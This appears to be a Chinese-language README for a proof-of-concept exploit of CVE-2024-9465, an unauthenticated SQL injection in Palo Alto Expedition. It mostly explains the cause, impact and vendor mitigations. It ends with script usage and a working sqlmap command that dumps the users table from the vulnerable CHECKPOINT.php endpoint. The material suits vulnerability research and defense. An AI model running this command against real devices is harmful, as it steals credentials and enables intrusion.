这是一个用于利用 CVE-2024-9465 漏洞的概念验证脚本,适用于存在该漏洞的设备。
CVE-2024-9465 是一个在 Palo Alto Networks 的 Expedition 工具中发现的严重 SQL 注入漏洞。该漏洞的 CVSS(通用漏洞评分系统)得分为 9.2,表明其潜在危害极大。
CVE-2024-9465 的根本问题在于 Expedition 系统中的一个 PHP 文件未能对输入进行适当的消毒。攻击者可以通过未受保护的 HTTP 端点发送恶意 SQL 查询,从而利用这一漏洞。具体来说,攻击者可以构造特定的请求,使得 Expedition 系统能够在其数据库中创建表格、注入查询,并转储敏感数据,而这一切都不需要有效的身份凭证。
该漏洞位于 Expedition Web 根目录下的 CHECKPOINT.php
文件中,该文件直接使用 HTTP 请求参数生成 SQL 查询。这种设计缺陷使得攻击者能够利用工具如 SQLMAP 来执行攻击,获取数据库中的敏感信息,例如用户凭据、密码哈希值、设备配置和 API 密钥等。
CVE-2024-9465 的危害主要体现在以下几个方面:
-
敏感信息泄露:攻击者可以访问 Expedition 数据库中的敏感数据,包括用户名、密码哈希值和设备配置。这可能导致更广泛的安全风险,例如账户劫持和数据泄露。
-
系统控制权提升:通过该漏洞,攻击者不仅能够读取数据库内容,还可以创建和读取任意文件,从而可能进一步控制被入侵的网络。
-
连锁攻击可能性:该漏洞与其他多个漏洞(如命令注入和 XSS 漏洞)结合使用,可能使攻击者能够进行更复杂的攻击,例如完全接管防火墙管理权限。
为应对这一漏洞,Palo Alto Networks 已经发布了修复程序,并建议用户限制对 Expedition 工具的网络访问,以确保只有授权用户才能访问。同时,企业在不使用该工具时应考虑将其关闭,以降低风险。
漏洞根本原因和入侵指标请参考: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
% python3 CVE-2024-9465.py -h
使用方法: CVE-2024-9465.py [-h] -u URL
选项:
-h, --help 显示帮助信息并退出
-u URL, --url URL 目标 URL 地址
python3 sqlmap.py -u "https://<ip地址>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=import&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump